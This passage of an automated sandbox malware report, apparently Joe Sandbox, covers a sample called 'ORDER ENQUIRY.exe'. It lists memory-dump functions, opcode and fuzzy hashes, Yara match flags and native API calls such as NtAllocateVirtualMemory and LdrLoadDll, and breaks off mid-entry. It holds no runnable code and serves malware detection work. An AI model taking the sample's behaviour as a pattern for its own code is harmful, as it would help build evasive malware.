Opcode ID: 65a8ddbb3d312522964a1549b83feacafd25c24f7c34279d30d009c98ccb2216
Instruction ID: 09c2332c2f4aaabed5cc01a7a9ad58a88f5b34e6e3f3aa05c8dd6e79afd2bda6
Opcode Fuzzy Hash: 65a8ddbb3d312522964a1549b83feacafd25c24f7c34279d30d009c98ccb2216
Instruction Fuzzy Hash: 6511DFB6C006498FDB24DF9AC448A9EFBF4EB88224F10845AD529A7610D379A645CFA1

Function 077376D0 Relevance: 1.3, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,07738041,?,?), ref: 077381E8

Memory Dump Source

Source File: 00000000.00000002.2100158275.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7730000_ORDER ENQUIRY.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 7407ce9a712ee072bd24d0dc2332e6bea03fd5b693007a6d0ed0ea1a9c878e7d
Instruction ID: e2da70ac4056f0409e1e18c691360138442dfd22039577800afe4626d06738e9
Opcode Fuzzy Hash: 7407ce9a712ee072bd24d0dc2332e6bea03fd5b693007a6d0ed0ea1a9c878e7d
Instruction Fuzzy Hash: 861136B5800749DFCB20DF9AC545BEEBBF4EB48320F10885AE558A7341D738A944CFA5

Function 077376A4 Relevance: 1.3, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,07738041,?,?), ref: 077381E8

Memory Dump Source

Source File: 00000000.00000002.2100158275.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7730000_ORDER ENQUIRY.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 6d3e2b815d135f4ca14a279c8e779554485c4de298cd952dc5580f8baf145eb2
Instruction ID: 35a2d2db6e22957a87cf494dda3e8a69a5f03b092143dc71f41e771f7fc3ed45
Opcode Fuzzy Hash: 6d3e2b815d135f4ca14a279c8e779554485c4de298cd952dc5580f8baf145eb2
Instruction Fuzzy Hash: 601136B5800749DFCB20DF9AC544BEEBBF4EB48320F10881AE958A7341D738A944CFA5

Function 0773768C Relevance: 1.3, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,07738041,?,?), ref: 077381E8

Memory Dump Source

Source File: 00000000.00000002.2100158275.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7730000_ORDER ENQUIRY.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 429cbc3f89d37baee8b9114a8c944c03f831e2b83400833477c0a6a8c43e701c
Instruction ID: 1a74883255b231abc9d0855ff953eba4a851b9a8b393eece921a7db5d55341ee
Opcode Fuzzy Hash: 429cbc3f89d37baee8b9114a8c944c03f831e2b83400833477c0a6a8c43e701c
Instruction Fuzzy Hash: E91136B5800749DFCB20DF9AC544BEEBBF4EB48320F10881AE958A7341D738A944CFA5

Function 07738188 Relevance: 1.3, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,07738041,?,?), ref: 077381E8

Memory Dump Source

Source File: 00000000.00000002.2100158275.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7730000_ORDER ENQUIRY.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 8901648d6e42b3ae8ba4e3eff9acf81382dbffda9773477e91c2b8fd7e1ecc29
Instruction ID: e5e6d99f0e673fece391d2dd6776b9150c014dc570d8f7bc25af878153491c0c
Opcode Fuzzy Hash: 8901648d6e42b3ae8ba4e3eff9acf81382dbffda9773477e91c2b8fd7e1ecc29
Instruction Fuzzy Hash: 571125B5800649DFCB20DFAAC544BDEFBF4EB48320F14845AD958A7341C738A944CFA5

Function 0134D3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2096740919.000000000134D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0134D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_134d000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4038f9fb2df8cbe0e2eb7fd887d8a723fe941ffcbcb774227e90af67032ac074
Instruction ID: 92208e400ddccb8d0b50454cab875c281c205df1533ae519d22ad4138c847dfe
Opcode Fuzzy Hash: 4038f9fb2df8cbe0e2eb7fd887d8a723fe941ffcbcb774227e90af67032ac074
Instruction Fuzzy Hash: AD213671500204DFDB05DF58D9C0B56BFA9FBA8328F20C169E9091B356C73AF416CAA1

Function 0134D4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2096740919.000000000134D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0134D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_134d000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a4af3beaa71045eb518469f65275c44b6a5f9b3efb7b2702545b6a023979795
Instruction ID: 4b2939349e828a5598663d3ef97eaaac67ca89fadcf0b150faecc0fdff3927e6
Opcode Fuzzy Hash: 1a4af3beaa71045eb518469f65275c44b6a5f9b3efb7b2702545b6a023979795
Instruction Fuzzy Hash: D4210671500244DFDB05DF58D9C0F26BFA5FB9831CF20C5A9E9090B256C736E416CAE1

Function 0135D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2096787414.000000000135D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0135D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_135d000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6302d58d8cd4bbcd598096ccb76a11290587070e8ff44d5922e3be1b5461ba9e
Instruction ID: 116364d80e1f5f598cb49227b55c40f1ce73a67d81f605f02fc81a06b527ca25
Opcode Fuzzy Hash: 6302d58d8cd4bbcd598096ccb76a11290587070e8ff44d5922e3be1b5461ba9e
Instruction Fuzzy Hash: 8B21F271504204EFDB45DFA8D9C0F26BBA9FB88728F20C56DED094B356C37AD446CA61

Function 0135D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2096787414.000000000135D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0135D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_135d000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e61f8af8d198d844a2345143052c0ac8f56301e27e71c649a7a1e037c6bf877
Instruction ID: bbd80a4bbd83f6e05351741ffbec349d6427071dec8cf31c75406266e519e97c
Opcode Fuzzy Hash: 6e61f8af8d198d844a2345143052c0ac8f56301e27e71c649a7a1e037c6bf877
Instruction Fuzzy Hash: 1A210071604204DFDB55DF68D980F26BF69FB88718F20C569DD0A4B356C33AD407CAA2

Function 0135D006 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2096787414.000000000135D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0135D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_135d000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 455f27f5a1c4b5727e5bbcfd3409590a611660998f1ba35b5bec849770dd769d
Instruction ID: 8ad15cf1f81900b12dab9fdcc30549d1ee65959bbaadfc89c097af4a24d61d0e
Opcode Fuzzy Hash: 455f27f5a1c4b5727e5bbcfd3409590a611660998f1ba35b5bec849770dd769d
Instruction Fuzzy Hash: 5B21A1755093808FDB03CF24D994B15BF71EB46218F28C5EAD8498B2A7C33AD40ACB62

Function 0134D4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2096740919.000000000134D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0134D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_134d000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
Instruction ID: 7e56dff6ce86a9f86a0e4f67ed0ea9fef9f459d06142c34e733174240de8cbea
Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
Instruction Fuzzy Hash: A811E172504280CFCB02CF54D5C4B16BFB1FB98318F24C6A9D9490B257C336E45ACBA2

Function 0134D3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2096740919.000000000134D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0134D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_134d000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
Instruction ID: 4ddff949096dca967a31d53ef32a9a2e41829a0bf8b66df62a243119d8648ee7
Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
Instruction Fuzzy Hash: 3611CD76404240CFDB02CF54D5C4B56BFA1FB94224F24C6A9D9090A256C33AE45ACBA2

Function 0135D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2096787414.000000000135D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0135D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_135d000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
Instruction ID: d4686fb2c76aee4e513f03a27523c52dafd1d20ec333f5a85839c915d17d9704
Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
Instruction Fuzzy Hash: 1811BB75504280DFDB02CF54C5C4B15BFB1FB84628F24C6ADDC494B296C33AD44ACB62

Function 0134D745 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2096740919.000000000134D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0134D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_134d000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abc40d2990824f7cdad8dd48942dcfc230b09a3c069d35f9469d6673e7fb738c
Instruction ID: 8f5d40f927207c026d24a5af90c7c5a7bff50f4fbd6aabdcbee42e77b977a7b1
Opcode Fuzzy Hash: abc40d2990824f7cdad8dd48942dcfc230b09a3c069d35f9469d6673e7fb738c
Instruction Fuzzy Hash: BC012B310043849BE720CF99CD84B67FFDCEF55328F18C52AED090A286C239A800CA71

Function 0134D744 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2096740919.000000000134D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0134D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_134d000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b6ba5364c229693d74d3ced9778e20fbad15e8ea9a7340068818d21c651b93f
Instruction ID: c1451bdfccc5d028b2c668e90209e99ae2873d44cdd61d344aec389b532aef34
Opcode Fuzzy Hash: 3b6ba5364c229693d74d3ced9778e20fbad15e8ea9a7340068818d21c651b93f
Instruction Fuzzy Hash: 3DF062714043849FE7118E1AC888B66FFD8EF55738F18C45AED485A286C27AA844CBB1

Non-executed Functions

Function 07738C28 Relevance: .4, Instructions: 380COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2100158275.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7730000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb0b5d05e0de4e7a716c1d602d8185789364ef243416f8af1c4f384de514998a
Instruction ID: 2f367e0f6b67191e00e03104e9f4db2071e120faceab83a85d83a4f22363e018
Opcode Fuzzy Hash: fb0b5d05e0de4e7a716c1d602d8185789364ef243416f8af1c4f384de514998a
Instruction Fuzzy Hash: E6D1CFB0B012068FDB29DB75C4547AEB7F6AF89340F14486DE1469B391DB39E901CB62

Function 07730F88 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2100158275.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7730000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fa5085c4a40f8e4a36fcace727b6843c5890fc8aeccceb425bf8f8edb27378
Instruction ID: 4442d89ac7fa67af06781addeca9e1671ab75a77f31f3cf11d35862163c2a896
Opcode Fuzzy Hash: 80fa5085c4a40f8e4a36fcace727b6843c5890fc8aeccceb425bf8f8edb27378
Instruction Fuzzy Hash: 18E109B4E006598FCB14CFA9C5809AEFBB2FF89305F648169D414AB356D734AD42CF61

Function 07730B50 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2100158275.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7730000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2aa5930786b63aba64e8fd82059cb0dbbdc601a9668cf0f84bf8142143ff74a9
Instruction ID: ff7bb7468323d7ffafe53f2d6ae80c4addcdaafe46272b7d52f04aafd6423e98
Opcode Fuzzy Hash: 2aa5930786b63aba64e8fd82059cb0dbbdc601a9668cf0f84bf8142143ff74a9
Instruction Fuzzy Hash: 73E1C7B4E002598FCB14DFA9C5809AEFBB2FF89305F248169D414AB356DB35AD42CF61

Function 07733340 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2100158275.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7730000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0ed86039c7081e110cca45b696392baa6b3bff7db43ec593c672ce6b8ebb9ab
Instruction ID: 88415df47e0ca038c304317b46302f99312976ecbfe73e5df74b2fd2c467c339
Opcode Fuzzy Hash: b0ed86039c7081e110cca45b696392baa6b3bff7db43ec593c672ce6b8ebb9ab
Instruction Fuzzy Hash: D5E1D8B4E002598FDB14CFA9C5809AEBBB2FF89305F248169D414AB356DB31A942CF61

Function 077313C0 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2100158275.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7730000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8be8172cf623e2e768579f07bb5d76d35fc7f1c902c1d8cbf05c672edaaf0ee
Instruction ID: 9fc5bc2d2f477ec7d9f39f1694693b9b96fbc9509185cb256fe9a41ba93bdaec
Opcode Fuzzy Hash: d8be8172cf623e2e768579f07bb5d76d35fc7f1c902c1d8cbf05c672edaaf0ee
Instruction Fuzzy Hash: FDE1E7B4E006598FCB14CFA9C5809AEBBB2FF89305F64C169D415AB356DB30AD42CF61

Function 07732A68 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2100158275.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7730000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fdd4d654d00faddf83fe7f3b7136e281aaef2b24bcf27cd3726c7cf870e93aad
Instruction ID: 10b914855d5f69cca01623447be39a67259681d76db3ecdfc5e0628f84eb4c68
Opcode Fuzzy Hash: fdd4d654d00faddf83fe7f3b7136e281aaef2b24bcf27cd3726c7cf870e93aad
Instruction Fuzzy Hash: 9EE1D9B4E102598FCB14DFA9C5809AEBBB2FF49305F24C169D814A7356DB31A942CF61

Function 015ED3E4 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2097227902.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_15e0000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61b879969ffe543d935808584a9fba890f8541dd258049971829c8857034d098
Instruction ID: 8c9d0f3072e8e0e48d4ffd5f4d3b1ab4f9895269293e9e7888d06be75839cf65
Opcode Fuzzy Hash: 61b879969ffe543d935808584a9fba890f8541dd258049971829c8857034d098
Instruction Fuzzy Hash: 1DA13A32E0021A8FCF09DFA4C84859EBBF2FF85304B15856AE906AF265DF71E955CB50

Function 077313AF Relevance: .1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2100158275.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7730000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4565aa5b0efb77e60ff8e0f205dc5036657b9df99d2793beeab1a85d46359cba
Instruction ID: 8fd280a1a1ff8c183024d04dd79720222eb1f0a0173d57333d6ea77f3ce83403
Opcode Fuzzy Hash: 4565aa5b0efb77e60ff8e0f205dc5036657b9df99d2793beeab1a85d46359cba
Instruction Fuzzy Hash: 22510BB4E006198FDB14CFA9C5805AEFBF2FF89305F24C16AD418A7256DB349A42CF61

Function 07730F78 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2100158275.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7730000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06093e842168260a0be54c6c877b88f7aeb3d351a632ddf165fe8aaa69040904
Instruction ID: d7ed5feb289631e6fa907243e6e56fe3c86e07b44ad01ed680f5088883486483
Opcode Fuzzy Hash: 06093e842168260a0be54c6c877b88f7aeb3d351a632ddf165fe8aaa69040904
Instruction Fuzzy Hash: 15511EB4E046598FCB14CFA9C9805AEFBF2FF89305F64C169D418AB256D7309A42CF61

Function 07735850 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2100158275.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7730000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2828f2c18bf18cf2ac4b400a78dd14978a14a5698bc251a91e9c9f82d505ce6
Instruction ID: 1578e5019c5d743a158f8742dfc4abd845e3d54689391ca9663e0cb4a3f04f8a
Opcode Fuzzy Hash: c2828f2c18bf18cf2ac4b400a78dd14978a14a5698bc251a91e9c9f82d505ce6
Instruction Fuzzy Hash: 72C04CA6AAF008D686104DA5A0054F8B77CA28B1B3F013461D50EA3503575055395645

Analysis Process: ORDER ENQUIRY.exePID: 4564, Parent PID: 3032COMMON

Execution Graph

Execution Coverage:	1.4%
Dynamic/Decrypted Code Coverage:	2.6%
Signature Coverage:	5.8%
Total number of Nodes:	569
Total number of Limit Nodes:	73

Executed Functions

Function 0041A3FC Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 38
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtReadFile.NTDLL(bMA,5EB65239,FFFFFFFF,?,?,?,bMA,?,!JA,FFFFFFFF,5EB65239,00414D62,?,00000000), ref: 0041A445

Strings

bMA, xrefs: 0041A422, 0041A430
bMA, xrefs: 0041A43D, 0041A444
!JA, xrefs: 0041A41C, 0041A428

Memory Dump Source

Source File: 00000003.00000002.2155700092.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ORDER ENQUIRY.jbxd

Yara matches

Similarity

API ID: FileRead
String ID: !JA$bMA$bMA
API String ID: 2738559852-4222312340
Opcode ID: 810d5cb43e145769651c73e418014ac09a1dcbaa7b10a7da9088c6c756a8ac26
Instruction ID: 9d81fa899a4132681739b3ed890e3f8aefbd529ac8edec776db25eb8573ecfe4
Opcode Fuzzy Hash: 810d5cb43e145769651c73e418014ac09a1dcbaa7b10a7da9088c6c756a8ac26
Instruction Fuzzy Hash: 75F0F4B2200108AFCB14DF89DC80EEB77ADEF8C714F118248FE1D97245C630E8528BA4

Function 0041A400 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtReadFile.NTDLL(bMA,5EB65239,FFFFFFFF,?,?,?,bMA,?,!JA,FFFFFFFF,5EB65239,00414D62,?,00000000), ref: 0041A445

Strings

bMA, xrefs: 0041A422, 0041A430
bMA, xrefs: 0041A43D, 0041A444
!JA, xrefs: 0041A41C, 0041A428

Memory Dump Source

Source File: 00000003.00000002.2155700092.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ORDER ENQUIRY.jbxd

Yara matches

Similarity

API ID: FileRead
String ID: !JA$bMA$bMA
API String ID: 2738559852-4222312340
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: 27817754ac388b25b847a3362b671b2e44b934df7eae6808a762aa4d31f9cf83
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: 93F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4

Function 0041A34A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00409CE3,?,00414BA7,00409CE3,FFFFFFFF,?,?,FFFFFFFF,00409CE3,00414BA7,?,00409CE3,00000060,00000000,00000000), ref: 0041A39D

Strings

t8U-, xrefs: 0041A34A

Memory Dump Source

Source File: 00000003.00000002.2155700092.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ORDER ENQUIRY.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: t8U-
API String ID: 823142352-1836231067
Opcode ID: 3d047a12e86e0060f3c4fec99ac482bed11b1e44987b9d6aceca61a5bb8e7364
Instruction ID: 5684d836d4401de03301fa4ac531b823d2e21afc1e2ba19bbd461c16835d3b5f
Opcode Fuzzy Hash: 3d047a12e86e0060f3c4fec99ac482bed11b1e44987b9d6aceca61a5bb8e7364
Instruction Fuzzy Hash: 57F0CFB2201108AFDB08CF89DC95EEB77ADAF8C754F158649FA1DA7240C630EC51CBA4

Function 0040ACE0 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD52

Memory Dump Source

Source File: 00000003.00000002.2155700092.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ORDER ENQUIRY.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
Instruction ID: d499f532a4605d4acc668fd39ab8700ce4e6b27de0f8ef54b1fb0fb48fae0bb4
Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
Instruction Fuzzy Hash: EF0152B5D4020DA7DB10EBA5DC42FDEB3789F14308F0041A5E908A7281F634EB54CB95

Function 0041A350 Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00409CE3,?,00414BA7,00409CE3,FFFFFFFF,?,?,FFFFFFFF,00409CE3,00414BA7,?,00409CE3,00000060,00000000,00000000), ref: 0041A39D

Memory Dump Source

Source File: 00000003.00000002.2155700092.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ORDER ENQUIRY.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 880687b14e2bfdcefdfb108c829fe1d34a34742feba638e3287dae326a4d6923
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: AAF0BDB2201208AFCB08CF89DC85EEB77ADAF8C754F158248BA1D97241C630E8518BA4

Function 0041A52A Relevance: 1.5, APIs: 1, Instructions: 32
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B124,?,00000000,?,00003000,00000040,00000000,00000000,00409CE3), ref: 0041A569

Memory Dump Source

Source File: 00000003.00000002.2155700092.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ORDER ENQUIRY.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: bb329d3e206d8cb0afadfb714a2f9d6c46c93fb371c27f8cea12270a62e61297
Instruction ID: 3a8b7ae16d43a5b6780630cf5ea03f75a5d02fcc9936d9f408cbadd04ea999d5
Opcode Fuzzy Hash: bb329d3e206d8cb0afadfb714a2f9d6c46c93fb371c27f8cea12270a62e61297
Instruction Fuzzy Hash: 7FF0F2B6210208ABDB18DF89DC81EEB77A9AF88754F118549BA18A7241C631E951CBA4

Function 0041A530 Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B124,?,00000000,?,00003000,00000040,00000000,00000000,00409CE3), ref: 0041A569

Memory Dump Source

Source File: 00000003.00000002.2155700092.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ORDER ENQUIRY.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: 4e0f78fd3c2c10b6dba7ecb12144fed22081eaa1fb7babd41561f41a61d0d9a2
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: A3F015B2200208AFCB14DF89CC81EEB77ADAF88754F118149BE1C97241C630F811CBA4

Function 0041A47A Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A4A5

Memory Dump Source

Source File: 00000003.00000002.2155700092.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ORDER ENQUIRY.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: f1f7e2854e4d8cd8b94677edc3baa00c143023764aaabac18f040c24d822df96
Instruction ID: 8c681633a3b22e1261c45266d31317880d9b0d1346b3794ab9aa63f2a9f5fe73
Opcode Fuzzy Hash: f1f7e2854e4d8cd8b94677edc3baa00c143023764aaabac18f040c24d822df96
Instruction Fuzzy Hash: 68E08C76640200AFD714DFA4CC86EEB7B69EF84364F14455EB91D9B292C530A9008BD0

Function 0041A480 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A4A5

